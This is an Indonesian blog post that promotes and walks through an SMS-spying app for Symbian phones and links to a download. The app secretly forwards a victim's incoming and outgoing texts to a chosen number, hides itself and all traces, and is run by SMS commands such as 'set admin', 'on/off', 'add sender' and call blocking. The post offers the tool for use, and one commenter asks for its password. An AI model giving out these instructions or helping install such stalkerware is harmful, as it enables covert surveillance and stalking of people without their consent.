Followers

Blog Archive

Selasa, 29 Desember 2009

SMS monitor (aplikasi untuk menyadap sms)

Bagikan :
Tahukah kamu bahwa sms-mu bisa disadap oleh orang, semua sms, dari sms masuk sampai sms keluar, temasuk siapa pengirimnya dan ke siapa kamu kirim. Semuanya disadap dengan menfoward sms keluar dan masuk mu ke nomer si penyadap, kamu tidak akan pernah tahu karena tidak akan ada bekas sms forward-an tersebut di sms terkirim, karena suatu aplikasi penyadap yang ditanamkan penyadap ke ponselmu akan menyembunyikan semuanya, termasuk dirinya sendiri…., yang munkin kamu sadari hanya tarif smsmu terasa lebih mahal
Untuk menyadapnya maka harus menentukan nomer mana yang akan di gunakan untuk menyadap, nah disini caranya adalah mengirim sms dari nomer yang hendak digunakan menyadap (pake hape jadul juga gpp) ke nomer yang ada di lain HP dengan format set admin 0899***6884, dimana 0899***6884 adalah nomer Three saya yang akan digunakan sebagai penyadap sms dari nomer XL saya. Perhatikan gambar dibawah:

 
Perhatikan, sms diatas tidak akan terdeteksi di saya yg satunya, hanya terasa bergetar saja tanpa ada tanda sms baru, itu adalah tanda bahwa aplikasi berjalan dengan smooth. Nah sekarang otomatis Nomer XL yang di HP saya satunya tersadap oleh Three saya, jadi setiap XL saya menerima sms dan mengirim sms, nomer three saya akan mendapat laporan seperti dibawah, Fr menunjukkan XL saya mendapat sms dari nomer tersebut dan To menunjukkan tujuan saya mengirim sms tsb.



Jika kamu ingin mengganti nomer penyadapnya, maka dari nomer penyadap pertama tadi kamu tinggal kirim sms ke nomer yang disadap dengan format seperti diawal, tapi nomernya diisi nomer yang akan digunakan sebagai penyadap pengganti.
Oya ada kode-kode lain yang bisa kamu kirimkan ke nomer yang tersadap
  • Off    : Untuk menghentikan sementara penyadapan
  • On    : Untuk menghidupkan kembali penyadapan
  • Add sender +62818xxxxxx,+62811xxxxxx    : Untuk menyadap aktifitas sms dari dan ke nomer tertentu saja
  • Add    : Untuk kembali menyadap semua nomer
  • Block on    : Untuk memblok semua aktifitas telpon masuk dan keluar yang disadap
  • Block off    : Untuk mematikan blokir telpon diatas (defaultnya ini yang aktif) 
KLIK UNTUK DOWNLOAD

Aplikasi  ini hanya bisa diinstall di ponsel symbian versi 3 milik Nokia, LG dan Samsung, ada kemungkinan bisa juga di ponsel symbian versi 5 Nokia, Samsung dan Sony Ericsson.

NB: Saya coba pakai operator Three & XL ,Untuk yg memakai operator lain silahkan dicoba sendiri...

POSTING BERKAITAN

TEMPLATE DESIGN BY
m-template | by:bagas96

1 komentar:

Anonim mengatakan...

passwordnya apa gan??

Enter yuor email address: Bookmark and Share
© 2011-2015 | aci.wapka.mobi | design by baguz